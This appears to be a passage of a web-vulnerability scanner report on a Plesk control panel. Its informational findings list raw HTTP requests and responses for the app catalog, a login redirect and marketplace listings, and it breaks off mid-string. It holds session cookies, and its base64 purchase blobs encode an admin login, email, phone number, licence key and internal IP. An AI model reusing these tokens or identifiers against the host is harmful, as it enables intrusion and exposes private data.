data: {"icon":"http:\/\/catalog.marketplace.parallels.com\/storage\/gallery.menalto.com\/gallery\/2.3.1-4\/Parallels\/undefined\/undefined\/undefined\/resources\/images\/icon.png","title":"gallery","info":"Quickly organize your photos online","details":{"id":"9fb54e3878b6fc9ffdafe03546f6817c","guid":"tag:catalog.marketplace.parallels.com,2011-04-20:\/1.2\/gallery.menalto.com\/gallery\/2.3.1-4\/Parallels\/undefined\/undefined\/undefined","appId":"http:\/\/gallery.menalto.com\/","name":"gallery","version":"2.3.1","release":"4","vendor":"gallery.menalto.com","packager":"Parallels","isAps":true,"packageUrl":"","rating":50,"packageId":0,"categories":["Web\/Gallery"]}} })
, new Smb.AdminHome.CatalogApplicationItem({
catalogId: "marketplace",
data: {"icon":"http:\/\/catalog.marketplace.parallels.com\/static\/images\/nonaps\/trust_wave.jpg","title":"Trustwave PCI Validation","info":"Utilize Trustwave monthly server scans to keep you PCI compliant","details":{"id":"77410f204e0929a7aa85cd65c74796d8","guid":"tag:catalog.marketplace.parallels.com,2011-03-06:\/none\/Parallels\/Trustwave%20PCI%20Validation\/1-0\/Parallels\/undefined\/undefined\/undefined","appId":"https:\/\/www.trustwave.com\/vulnerabilityScanning.php","name":"Trustwave PCI Validation","version":"1","release":"0","vendor":"Parallels","packager":"Parallels","isAps":false,"packageUrl":"https:\/\/www.trustkeeper.net\/esp\/Login.public","rating":50,"packageId":0,"categories":["Back office\/Compliance and Risk Management"]}} })
]
});
});
//]]>
</script>

12.6. http://vulnerable.plesk.control.panel.20110407.20:8880/smb/app/categories-data/catalogId/apscatalog  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.nosedivesailing.com:8880
Path:   /smb/app/categories-data/catalogId/apscatalog

Request

GET /smb/app/categories-data/catalogId/apscatalog HTTP/1.1
Host: vulnerable.plesk.control.panel.20110407.20:8880
Proxy-Connection: keep-alive
Referer: http://www.nosedivesailing.com:8880/smb/app/available/id/apscatalog
X-Prototype-Version: 1.6.1_rc3
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: text/javascript, text/html, application/xml, text/xml, */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PLESKSESSID=66f4f3aa52eb21d7134fc0175f742f5a; locale=en-US; psaContext=dashboard

Response

HTTP/1.1 200 OK
Cache-Control: post-check=0, pre-check=0,no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Last-Modified: Mon, 23 May 2011 19:24:11 GMT
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA"
X-Powered-By: ASP.NET
Date: Mon, 23 May 2011 19:24:10 GMT
Connection: close
Content-Length: 3763

<ul class="aps-category-list"> <li class="ac-web">
<div class="aps-category-block">
<h4><a href="#" onclick='apsCatalog.showCategory("Web");'>Web</a>
<span>(86)</span> </h4>
<div class="aps-category-items">
<a href="#" onclick='apsCatalog.showCategory("Web/Analytics");' >
Analytics</a>, <a href="#" onclick='apsCatalog.showCategory("Web/Blog");' >
Blog</a>, <a href="#" onclick='apsCatalog.showCategory("Web/Catalog");' >
Catalog</a>, <a href="#" onclick='apsCatalog.showCategory("Web/Content management");' >
Content management</a>, <a href="#" onclick='apsCatalog.showCategory("Web/E-commerce");' >
E-commerce</a>, <a href="#" onclick='apsCatalog.showCategory("Web/eLearning");' >
eLearning</a>, <a href="#" onclick='apsCatalog.showCategory("Web/Forum");' >
Forum</a>, <a href="#" onclick='apsCatalog.showCategory("Web/Gallery");' >
Gallery</a>, <a href="#" onclick='apsCatalog.showCategory("Web/Search");' >
Search</a>, <a href="#" onclick='apsCatalog.showCategory("Web/Tools");' >
Tools</a> </div>
</div>
</li>
<li class="ac-collaboration">
<div class="aps-category-block">
<h4><a href="#" onclick='apsCatalog.showCategory("Collaboration");'>Collaboration</a>
<span>(39)</span> </h4>
<div class="aps-category-items">
<a href="#" onclick='apsCatalog.showCategory("Collaboration/Calendaring");' >
Calendaring</a>, <a href="#" onclick='apsCatalog.showCategory("Collaboration/Chat");' >
Chat</a>, <a href="#" onclick='apsCatalog.showCategory("Collaboration/Email");' >
E-mail</a>, <a href="#" onclick='apsCatalog.showCategory("Collaboration/IP telephony");' >
IP telephony</a>, <a href="#" onclick='apsCatalog.showCategory("Collaboration/Portal");' >
Portal</a>, <a href="#" onclick='apsCatalog.showCategory("Collaboration/Project management");' >
Project management</a>, <a href="#" onclick='apsCatalog.showCategory("Collaboration/Web conferencing");' >
Web conferencing</a> </div>
</div>
</li>
<li class="ac-front-office">
<div class="aps-category-block">
<h4><a href="#" onclick='apsCatalog.showCategory("Front office");'>Front office</a>
<span>(14)</span> </h4>
<div class="aps-category-items">
<a href="#" onclick='apsCatalog.showCategory("Front office/Help Desk");' >
Help desk</a>, <a href="#" onclick='apsCatalog.showCategory("Front office/Productivity");' >
Productivity</a>, <a href="#" onclick='apsCatalog.showCategory("Front office/Survey Solutions");' >
Survey solutions</a> </div>
</div>
</li>
<li class="ac-back-office">
<div class="aps-category-block">
<h4><a href="#" onclick='apsCatalog.showCategory("Back office");'>Back office</a>
<span>(8)</span> </h4>
<div class="aps-category-items">
<a href="#" onclick='apsCatalog.showCategory("Back office/Accounting and Financial");' >
Accounting and Financial</a>, <a href="#" onclick='apsCatalog.showCategory("Back office/Asset Management");' >
Asset management</a>, <a href="#" onclick='apsCatalog.showCategory("Back office/Billing");' >
Billing</a>, <a href="#" onclick='apsCatalog.showCategory("Back office/Compliance and Risk Management");' >
Compliance and Risk Management</a>, <a href="#" onclick='apsCatalog.showCategory("Back office/Customer Relationship Management");' >
Customer relationship management</a>, <a href="#" onclick='apsCatalog.showCategory("Back office/Enterprise Resource Planning");' >
Enterprise resource planning</a>, <a href="#" onclick='apsCatalog.showCategory("Back office/Knowledge Management");' >
Knowledge management</a> </div>
</div>
</li>
</ul>

12.7. http://vulnerable.plesk.control.panel.20110407.20:8880/smb/app/install/metaId/1  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.nosedivesailing.com:8880
Path:   /smb/app/install/metaId/1

Request

GET /smb/app/install/metaId/1 HTTP/1.1
Host: vulnerable.plesk.control.panel.20110407.20:8880
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.nosedivesailing.com:8880/smb/app/eula/metaId/1
Cookie: locale=en-US; psaContext=dashboard; PLESKSESSID=483627fb8a4e908eab18dad06863ab2f
Cache-Control: max-age=0

Response

HTTP/1.1 200 OK
Cache-Control: post-check=0, pre-check=0,no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Last-Modified: Tue, 24 May 2011 01:12:47 GMT
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA"
X-Powered-By: ASP.NET
Date: Tue, 24 May 2011 01:12:46 GMT
Connection: close
Content-Length: 1269


       <html><head>
       <meta http-equiv="X-UA-Compatible" content="IE=7"/>
       <title></title>
       <script language="javascript" type="text/javascript" src="/javascript/common.js?plesk_version=psa-10.2.0-20110407.20"/></script>
       <script language="javascript" type="text/javascript" src="/javascript/prototype.js?plesk_version=psa-10.2.0-20110407.20"></script>
       <script>
           var opt_no_frames = false;
           var opt_integrated_mode = false;
       </script>
       
       </head><body onLoad=";top.location='/login.php3';"></body><noscript>You will be redirected to the new address in 15 seconds... If you are not automatically taken to the new location, please enable javascript or click the hyperlink <a href="/login.php3" target="top">/login.php3</a>.</noscript></html><!--______________________________________________________________________________________________________________________________________________________________________________________________________________________________________________IE error page size limitation______________________________________________________________________________________________________________________________________________________________________________________________________________________________________________-->

12.8. http://vulnerable.plesk.control.panel.20110407.20:8880/smb/app/search-data/catalogId/marketplace  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.nosedivesailing.com:8880
Path:   /smb/app/search-data/catalogId/marketplace

Request

GET /smb/app/search-data/catalogId/marketplace?name=&vendor=&packager=&cert=any HTTP/1.1
Host: vulnerable.plesk.control.panel.20110407.20:8880
Proxy-Connection: keep-alive
Referer: http://www.nosedivesailing.com:8880/smb/app/market/id/marketplace
X-Prototype-Version: 1.6.1_rc3
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: text/javascript, text/html, application/xml, text/xml, */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PLESKSESSID=17161f28b87a6960fb097d11330c9c53; locale=en-US; psaContext=dashboard

Response

HTTP/1.1 200 OK
Cache-Control: post-check=0, pre-check=0,no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Last-Modified: Mon, 23 May 2011 18:23:19 GMT
Server: Microsoft-IIS/7.5
P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA"
X-Powered-By: ASP.NET
Date: Mon, 23 May 2011 18:23:20 GMT
Connection: close
Content-Length: 52670

<div class="aps-marketplace"><ul class="aps-marketplace-list"><li class="odd">
<div class="package-block">
<div class="package-content clearfix">
<div class="package-icon">
<a href="#" onclick='apsCatalog.showDetails({"id":"52412fe2a4fc93be504d9fc07fe89286","guid":"tag:catalog.marketplace.parallels.com,2009-08-31:\/none\/Symantec\/Norton%20Internet%20Security\/2010-1\/Symantec\/undefined\/undefined\/undefined","appId":"http:\/\/www.symantec.com\/norton\/internet-security","name":"Norton Internet Security","version":"2010","release":"1","vendor":"Symantec","packager":"Symantec","isAps":false,"packageUrl":"","rating":200,"packageId":0,"categories":["Web\/Tools"]})'><img src="http://catalog.marketplace.parallels.com/static/images/nonaps/norton-box.png"/></a>
</div>
<div class="package-info">
<h4><a href="#" onclick='apsCatalog.showDetails({"id":"52412fe2a4fc93be504d9fc07fe89286","guid":"tag:catalog.marketplace.parallels.com,2009-08-31:\/none\/Symantec\/Norton%20Internet%20Security\/2010-1\/Symantec\/undefined\/undefined\/undefined","appId":"http:\/\/www.symantec.com\/norton\/internet-security","name":"Norton Internet Security","version":"2010","release":"1","vendor":"Symantec","packager":"Symantec","isAps":false,"packageUrl":"","rating":200,"packageId":0,"categories":["Web\/Tools"]})'>Norton Internet Security</a></h4>
<div class="package-description">Protect your desktop against viruses and spyware</div>
</div>
</div>
<div class="package-actions">
<a class="s-btn action" href="#" onclick='Smb.ApsLicense.buy("https://shop.marketplace.parallels.com/index.php?act=marketplace_dispatch", "bXBjX3NsYXZlX2lkPSZwc2Ffa2V5X251bWJlcj1QTFNLLjAxNTQ3NDU2LjAwMDAmcHNhX3NlcnZlcl9pcD0xNzIuMTYuMjQ4LjkxJnBzYV9sb2dpbl90eXBlPVBTQV9BRE1JTiZwc2FfbG9naW5fbmFtZT14c3NjeCZwc2FfbG9naW5fY29tcGFueT0mcHNhX2xvZ2luX2VtYWlsPWgwMjMzMiU0MGdtYWlsLmNvbSZwc2FfbG9naW5fY29udGFjdF9uYW1lPUhveXQrTExDK1Jlc2VhcmNoJnBzYV9sb2dpbl9waG9uZT0lMkIxKzMzOSsyMDYrMTg4NiZwc2FfbG9naW5fY291bnRyeT0mcHNhX2xvZ2luX2FkZHJlc3M9JnBzYV9sb2dpbl9jaXR5PSZwc2FfbG9naW5fc3RhdGU9JnBzYV9sb2dpbl96aXBjb2RlPSZwc2FfdmVyc2lvbl9udW1iZXI9MTAuMi4wJnBzYV92ZXJzaW9uX2J1aWxkPTIwMTEwNDA3LjIwJnBzYV92ZXJzaW9uX29zPVdpbmRvd3MrMjAwMyUyRjIwMDgmbG9jYWxlPWVuJmFjdGlvbj1QVVJDSEFTRV9BUFBMSUNBVElPTl9MSUNFTlNFJnBzYV9hcGlfdXJsPWh0dHBzJTNBJTJGJTJGMTcyLjE2LjI0OC45MSUzQTg0NDMlMkZlbnRlcnByaXNlJTJGY29udHJvbCUyRmFnZW50LnBocCZwcm90b2NvbF92ZXJzaW9uPTEuMCZiYWNrX3JlZGlyZWN0X3VybD1odHRwJTNBJTJGJTJGd3d3Lm5vc2VkaXZlc2FpbGluZy5jb20lM0E4ODgwJTJGc21iJTJGYXBwJTJGbWFya2V0JTJGaWQlMkZtYXJrZXRwbGFjZSUzRmRldGFpbHMlMjU1Qmd1aWQlMjU1RCUzRHRhZyUyNTNBY2F0YWxvZy5tYXJrZXRwbGFjZS5wYXJhbGxlbHMuY29tJTI1MkMyMDA5LTA4LTMxJTI1M0ElMjUyRm5vbmUlMjUyRlN5bWFudGVjJTI1MkZOb3J0b24lMjUyNTIwSW50ZXJuZXQlMjUyNTIwU2VjdXJpdHklMjUyRjIwMTAtMSUyNTJGU3ltYW50ZWMlMjUyRnVuZGVmaW5lZCUyNTJGdW5kZWZpbmVkJTI1MkZ1bmRlZmluZWQlMjZkZXRhaWxzJTI1NUJhcHBJZCUyNTVEJTNEaHR0cCUyNTNBJTI1MkYlMjUyRnd3dy5zeW1hbnRlYy5jb20lMjUyRm5vcnRvbiUyNTJGaW50ZXJuZXQtc2VjdXJpdHklMjZkZXRhaWxzJTI1NUJuYW1lJTI1NUQlM0ROb3J0b24lMkJJbnRlcm5ldCUyQlNlY3VyaXR5JTI2ZGV0YWlscyUyNTVCdmVyc2lvbiUyNTVEJTNEMjAxMCUyNmRldGFpbHMlMjU1QnJlbGVhc2UlMjU1RCUzRDElMjZkZXRhaWxzJTI1NUJ2ZW5kb3IlMjU1RCUzRFN5bWFudGVjJTI2ZGV0YWlscyUyNTVCcGFja2FnZXIlMjU1RCUzRFN5bWFudGVjJTI2ZGV0YWlscyUyNTVCaXNBcHMlMjU1RCUzRDAlMjZkZXRhaWxzJTI1NUJwYWNrYWdlVXJsJTI1NUQlM0QmT3BlcmF0aW9uSUQ9UFVSQ0hBU0VfQVBQTElDQVRJT05fTElDRU5TRSZhcHBfdmVuZG9yX25hbWU9U3ltYW50ZWMmYXBwX25hbWU9Tm9ydG9uK0ludGVybmV0K1NlY3VyaXR5JmFwcF92ZXJzaW9uPTIwMTAmYXBwX3JlbGVhc2U9MSZhcHBfZ3VpZD1odHRwJTNBJTJGJTJGd3d3LnN5bWFudGVjLmNvbSUyRm5vcnRvbiUyRmludGVybmV0LXNlY3VyaXR5Jg=="); apsCatalog.showDetails({"id":"52412fe2a4fc93be504d9fc07fe89286","guid":"tag:catalog.marketplace.parallels.com,2009-08-31:\/none\/Symantec\/Norton%20Internet%20Security\/2010-1\/Symantec\/undefined\/undefined\/undefined","appId":"http:\/\/www.symantec.com\/norton\/internet-security","name":"Norton Internet Security","version":"2010","release":"1","vendor":"Symantec","packager":"Symantec","isAps":false,"packageUrl":"","rating":200,"packageId":0,"categories":["Web\/Tools"]}); return false;'><i><i><i>
<span>Buy now</span>
</i></i></i></a>
<a class="s-btn" href="#" onclick='apsCatalog.showDetails({"id":"52412fe2a4fc93be504d9fc07fe89286","guid":"tag:catalog.marketplace.parallels.com,2009-08-31:\/none\/Symantec\/Norton%20Internet%20Security\/2010-1\/Symantec\/undefined\/undefined\/undefined","appId":"http:\/\/www.symantec.com\/norton\/internet-security","name":"Norton Internet Security","version":"2010","release":"1","vendor":"Symantec","packager":"Symantec","isAps":false,"packageUrl":"","rating":200,"packageId":0,"categories":["Web\/Tools"]})'><i><i><i>
<span>Learn more</span>
</i></i></i></a>
</div>
</div>
</li><li class="even">
<div class="package-block">
<div class="package-content clearfix">
<div class="package-icon">
<a href="#" onclick='apsCatalog.showDetails({"id":"36982e514de66ecce35f2965926c4257","guid":"tag:catalog.marketplace.parallels.com,2011-04-20:\/1.2\/Persony,%20Inc.\/Persony%20Web%20Conferencing\/2.2.24.0-15\/Persony,%20Inc.\/undefined\/undefined\/undefined","appId":"http:\/\/persony.com\/smb.php","name":"Persony Web Conferencing","version":"2.2.24.0","release":"15","vendor":"Persony, Inc.","packager":"Persony, Inc.","isAps":true,"packageUrl":"","rating":180,"packageId":0,"categories":["Collaboration\/Web conferencing"]})'><img src="http://catalog.marketplace.parallels.com/storage/Persony%2C%20Inc./Persony%20Web%20Conferencing/2.2.24.0-15/Persony%2C%20Inc./undefined/undefined/undefined/resources/images/persony_icon.png"/></a>
</div>
<div class="package-info">
<h4><a href="#" onclick='apsCatalog.showDetails({"id":"36982e514de66ecce35f2965926c4257","guid":"tag:catalog.marketplace.parallels.com,2011-04-20:\/1.2\/Persony,%20Inc.\/Persony%20Web%20Conferencing\/2.2.24.0-15\/Persony,%20Inc.\/undefined\/undefined\/undefined","appId":"http:\/\/persony.com\/smb.php","name":"Persony Web Conferencing","version":"2.2.24.0","release":"15","vendor":"Persony, Inc.","packager":"Persony, Inc.","isAps":true,"packageUrl":"","rating":180,"packageId":0,"categories":["Collaboration\/Web conferencing"]})'>Persony Web Conferencing</a></h4>
<div class="package-description">Meet and collaborate with customers using web and video conferencing</div>
</div>
</div>
<div class="package-actions">
<a class="s-btn action" href="#" onclick='Smb.ApsLicense.buy("https://shop.marketplace.parallels.com/index.php?act=marketplace_dispatch", "bXBjX3NsYXZlX2lkPSZwc2Ffa2V5X251bWJlcj1QTFNLLjAxNTQ3NDU2LjAwMDAmcHNhX3NlcnZlcl9pcD0xNzIuMTYuMjQ4LjkxJnBzYV9sb2dpbl90eXBlPVBTQV9BRE1JTiZwc2FfbG9naW5fbmFtZT14c3NjeCZwc2FfbG9naW5fY29tcGFueT0mcHNhX2xvZ2luX2VtYWlsPWgwMjMzMiU0MGdtYWlsLmNvbSZwc2FfbG9naW5fY29udGFjdF9uYW1lPUhveXQrTExDK1Jlc2VhcmNoJnBzYV9sb2dpbl9waG9uZT0lMkIxKzMzOSsyMDYrMTg4NiZwc2FfbG9naW5fY291bnRyeT0mcHNhX2xvZ2luX2FkZHJlc3M9JnBzYV9sb2dpbl9jaXR5PSZwc2FfbG9naW5fc3RhdGU9JnBzYV9sb2dpbl96aXBjb2RlPSZwc2FfdmVyc2lvbl9udW1iZXI9MTAuMi4wJnBzYV92ZXJzaW9uX2J1aWxkPTIwMTEwNDA3LjIwJnBzYV92ZXJzaW9uX29zPVdpbmRvd3MrMjAwMyUyRjIwMDgmbG9jYWxlPWVuJmFjdGlvbj1QVVJDSEFTRV9BUFBMSUNBVElPTl9MSUNFTlNFJnBzYV9hcGlfdXJsPWh0dHBzJTNBJTJGJTJGMTcyLjE2LjI0OC45MSUzQTg0NDMlMkZlbnRlcnByaXNlJTJGY29udHJvbCUyRmFnZW50LnBocCZwcm90b2NvbF92ZXJzaW9uPTEuMCZiYWNrX3JlZGlyZWN0X3VybD1odHRwJTNBJTJGJTJGd3d3Lm5vc2VkaXZlc2FpbGluZy5jb20lM0E4ODgwJTJGc21iJTJGYXBwJTJGbWFya2V0JTJGaWQlMkZtYXJrZXRwbGFjZSUzRmRldGFpbHMlMjU1Qmd1aWQlMjU1RCUzRHRhZyUyNTNBY2F0YWxvZy5tYXJrZXRwbGFjZS5wYXJhbGxlbHMuY29tJTI1MkMyMDExLTA0LTIwJTI1M0ElMjUyRjEuMiUyNTJGUGVyc29ueSUyNTJDJTI1MjUyMEluYy4lMjUyRlBlcnNvbnklMjUyNTIwV2ViJTI1MjUyMENvbmZlcmVuY2luZyUyNTJGMi4yLjI0LjAtMTUlMjUyRlBlcnNvbnklMjUyQyUyNTI1MjBJbmMuJTI1MkZ1bmRlZmluZWQlMjUyRnVuZGVmaW5lZCUyNTJGdW5kZWZpbmVkJTI2ZGV0YWlscyUyNTVCYXBwSWQlMjU1RCUzRGh0dHAlMjUzQSUyNTJGJTI1MkZwZXJzb255LmNvbSUyNTJGc21iLnBocCUyNmRldGFpbHMlMjU1Qm5hbWUlMjU1RCUzRFBlcnNvbnklMkJXZWIlMkJDb25mZXJlbmNpbmclMjZkZXRhaWxzJTI1NUJ2ZXJzaW9uJTI1NUQlM0QyLjIuMjQuMCUyNmRldGFpbHMlMjU1QnJlbGVhc2UlMjU1RCUzRDE1JTI2ZGV0YWlscyUyNTVCdmVuZG9yJTI1NUQlM0RQZXJzb255JTI1MkMlMkJJbmMuJTI2ZGV0YWlscyUyNTVCcGFja2FnZXIlMjU1RCUzRFBlcnNvbnklMjUyQyUyQkluYy4lMjZkZXRhaWxzJTI1NUJpc0FwcyUyNTVEJTNEMSUyNmRldGFpbHMlMjU1QnBhY2thZ2VVcmwlMjU1RCUzRCZPcGVyYXRpb25JRD1QVVJDSEFTRV9BUFBMSUNBVElPTl9MSUNFTlNFJmFwcF92ZW5kb3JfbmFtZT1QZXJzb255JTJDK0luYy4mYXBwX25hbWU9UGVyc29ueStXZWIrQ29uZmVyZW5jaW5nJmFwcF92ZXJzaW9uPTIuMi4yNC4wJmFwcF9yZWxlYXNlPTE1JmFwcF9ndWlkPWh0dHAlM0ElMkYlMkZwZXJzb255LmNvbSUyRnNtYi5waHAm"); apsCatalog.showDetails({"id":"36982e514de66ecce35f2965926c4257","guid":"tag:catalog.marketplace.parallels.com,2011-04-20:\/1.2\/Persony,%20Inc.\/Persony%20Web%20Conferencing\/2.2.24.0-15\/Persony,%20Inc.\/undefined\/undefined\/undefined","appId":"http:\/\/persony.com\/smb.php","name":"Persony Web Conferencing","version":"2.2.24.0","release":"15","vendor":"Persony, Inc.","packager":"Persony, Inc.","isAps":true,"packageUrl":"","rating":180,"packageId":0,"categories":["Collaboration\/Web conferencing"]}); return false;'><i><i><i>
<span>Buy now</span>
</i></i></i></a>
<a class="s-btn" href="#" onclick='apsCatalog.showDetails({"id":"36982e514de66ecce35f2965926c4257","guid":"tag:catalog.marketplace.parallels.com,2011-04-20:\/1.2\/Persony,%20Inc.\/Persony%20Web%20Conferencing\/2.2.24.0-15\/Persony,%20Inc.\/undefined\/undefined\/undefined","appId":"http:\/\/persony.com\/smb.php","name":"Persony Web Conferencing","version":"2.2.24.0","release":"15","vendor":"Persony, Inc.","packager":"Persony, Inc.","isAps":true,"packageUrl":"","rating":180,"packageId":0,"categories":["Collaboration\/Web conferencing"]})'><i><i><i>
<span>Learn more</span>
</i></i></i></a>
</div>
</div>
</li><li class="odd">
<div class="package-block">
<div class="package-content clearfix">
<div class="package-icon">
<a href="#" onclick='apsCatalog.showDetails({"id":"cebc3b50af27c3218c3f1a937cb59ce2","guid":"tag:catalog.marketplace.parallels.com,2011-04-20:\/1.2\/WordPress.org\/WordPress\/3.0-5\/Parallels\/undefined\/undefined\/undefined","appId":"http:\/\/wordpress.org\/","name":"WordPress","version":"3.0","release":"5","vendor":"WordPress.org","packager":"Parallels","isAps":true,"packageUrl":"","rating":170,"packageId":0,"categories":["Web\/Blog"]})'><img src="http://catalog.marketplace.parallels.com/storage/WordPress.org/WordPress/3.0-5/Parallels/undefined/undefined/undefined/resources/images/icon.png"/></a>
</div>
<div class="package-info">
<h4><a href="#" onclick='apsCatalog.showDetails({"id":"cebc3b50af27c3218c3f1a937cb59ce2","guid":"tag:catalog.marketplace.parallels.com,2011-04-20:\/1.2\/WordPress.org\/WordPress\/3.0-5\/Parallels\/undefined\/undefined\/undefined","appId":"http:\/\/wordpress.org\/","name":"WordPress","version":"3.0","release":"5","vendor":"WordPress.org","packager":"Parallels","isAps":true,"packageUrl":"","rating":170,"packageId":0,"categories":["Web\/Blog"]})'>WordPress</a></h4>
<div class="package-description">Easily create or maintain a website or blog</div>
</div>
</div>
<div class="package-actions">
<a class="s-btn" href="#" onclick='apsCatalog.install({"id":"cebc3b50af27c3218c3f1a937cb59ce2","guid":"tag:catalog.marketplace.parallels.com,2011-04-20:\/1.2\/WordPress.org\/WordPress\/3.0-5\/Parallels\/undefined\/undefined\/undefined","appId":"http:\/\/wordpress.org\/","name":"WordPress","version":"3.0","release":"5","vendor":"WordPress.org","packager":"Parallels","isAps":true,"packageUrl":"","rating":170,"packageId":0,"categories":["Web\/Blog"]});return false;; return false;'><i><i><i>
<span>Install</span>
</i></i></i></a>
<a class="s-btn" href="#" onclick='apsCatalog.showDetails({"id":"cebc3b50af27c3218c3f1a937cb59ce2","guid":"tag:catalog.marketplace.parallels.com,2011-04-20:\/1.2\/WordPress.org\/WordPress\/3.0-5\/Parallels\/undefined\/undefined\/undefined","appId":"http:\/\/wordpress.org\/","name":"WordPress","version":"3.0","release":"5","vendor":"WordPress.org","packager":"Parallels","isAps":true,"packageUrl":"","rating":170,"packageId":0,"categories":["Web\/Blog"]})'><i><i><i>
<span>Learn more</span>
</i></i></i></a>
</div>
</div>
</li><li class="even">
<div class="package-block">
<div class="package-content clearfix">
<div class="package-icon">
<a href="#" onclick='apsCatalog.showDetails({"id":"c9e3ed12d5806f15eb2215c268749d1b","guid":"tag:catalog.marketplace.parallels.com,2011-04-26:\/1.2\/Pinnacle%20Cart%20Shopping%20Cart%20Software\/PinnacleCart\/3.7.7-350\/www.pinnaclecart.com\/undefined\/undefined\/undefined","appId":"http:\/\/www.pinnaclecart.com\/","name":"PinnacleCart","version":"3.7.7","release":"350","vendor":"Pinnacle Cart Shopping Cart Software","packager":"www.pinnaclecart.com","isAps":true,"packageUrl":"","rating":160,"packageId":0,"categories":["Web\/E-commerce"]})'><img src="http://catalog.marketplace.parallels.com/storage/Pinnacle%20Cart%20Shopping%20Cart%20Software/PinnacleCart/3.7.7-350/www.pinnaclecart.com/undefined/undefined/undefined/resources/images/pinnacle-icon.png"/></a>
</div>
<div class="package-info">
<h4><a href="#" onclick='apsCatalog.showDetails({"id":"c9e3ed12d5806f15eb2215c268749d1b","guid":"tag:catalog.marketplace.parallels.com,2011-04-26:\/1.2\/Pinnacle%20Cart%20Shopping%20Cart%20Software\/PinnacleCart\/3.7.7-350\/www.pinnaclecart.com\/undefined\/undefined\/undefined","appId":"http:\/\/www.pinnaclecart.com\/","name":"PinnacleCart","version":"3.7.7","release":"350","vendor":"Pinnacle Cart Shopping Cart Software","packager":"www.pinnaclecart.com","isAps":true,"packageUrl":"","rating":160,"packageId":0,"categories":["Web\/E-commerce"]})'>PinnacleCart</a></h4>
<div class="package-description">None</div>
</div>
</div>
<div class="package-actions">
<a class="s-btn action" href="#" onclick='Smb.ApsLicense.buy("https://shop.marketplace.parallels.com/index.php?act=marketplace_dispatch", "bXBjX3NsYXZlX2lkPSZwc2Ffa2V5X251bWJlcj1QTFNLLjAxNTQ3NDU2LjAwMDAmcHNhX3NlcnZlcl9pcD0xNzIuMTYuMjQ4LjkxJnBzYV9sb2dpbl90eXBlPVBTQV9BRE1JTiZwc2FfbG9naW5fbmFtZT14c3NjeCZwc2FfbG9naW5fY29tcGFueT0mcHNhX2xvZ2luX2VtYWlsPWgwMjMzMiU0MGdtYWlsLmNvbSZwc2FfbG9naW5fY29udGFjdF9uYW1lPUhveXQrTExDK1Jlc2VhcmNoJnBzYV9sb2dpbl9waG9uZT0lMkIxKzMzOSsyMDYrMTg4NiZwc2FfbG9naW5fY291bnRyeT0mcHNhX2xvZ2luX2FkZHJlc3M9JnBzYV9sb2dpbl9jaXR5PSZwc2FfbG9naW5fc3RhdGU9JnBzYV9sb2dpbl96aXBjb2RlPSZwc2FfdmVyc2lvbl9udW1iZXI9MTAuMi4wJnBzYV92ZXJzaW9uX2J1aWxkPTIwMTEwNDA3LjIwJnBzYV92ZXJzaW9uX29zPVdpbmRvd3MrMjAwMyUyRjIwMDgmbG9jYWxlPWVuJmFjdGlvbj1QVVJDSEFTRV9BUFBMSUNBVElPTl9MSUNFTlNFJnBzYV9hcGlfdXJsPWh0dHBzJTNBJTJGJTJGMTcyLjE2LjI0OC45MSUzQTg0NDMlMkZlbnRlcnByaXNlJTJGY29udHJvbCUyRmFnZW50LnBocCZwcm90b2NvbF92ZXJzaW9uPTEuMCZiYWNrX3JlZGlyZWN0X3VybD1odHRwJTNBJTJGJTJGd3d3Lm5vc2VkaXZlc2FpbGluZy5jb20lM0E4ODgwJTJGc21iJTJGYXBwJTJGbWFya2V0JTJGaWQlMkZtYXJrZXRwbGFjZSUzRmRldGFpbHMlMjU1Qmd1aWQlMjU1RCUzRHRhZyUyNTNBY2F0YWxvZy5tYXJrZXRwbGFjZS5wYXJhbGxlbHMuY29tJTI1MkMyMDExLTA0LTI2JTI1M0ElMjUyRjEuMiUyNTJGUGlubmFjbGUlMjUyNTIwQ2FydCUyNTI1MjBTaG9wcGluZyUyNTI1MjBDYXJ0JTI1MjUyMFNvZnR3YXJlJTI1MkZQaW5uYWNsZUNhcnQlMjUyRjMuNy43LTM1MCUyNTJGd3d3LnBpbm5hY2xlY2FydC5jb20lMjUyRnVuZGVmaW5lZCUyNTJGdW5kZWZpbmVkJTI1MkZ1bmRlZmluZWQlMjZkZXRhaWxzJTI1NUJhcHBJZCUyNTVEJTNEaHR0cCUyNTNBJTI1MkYlMjUyRnd3dy5waW5uYWNsZWNhcnQuY29tJTI1MkYlMjZkZXRhaWxzJTI1NUJuYW1lJTI1NUQlM0RQaW5uYWNsZUNhcnQlMjZkZXRhaWxzJTI1NUJ2ZXJzaW9uJTI1NUQlM0QzLjcuNyUyNm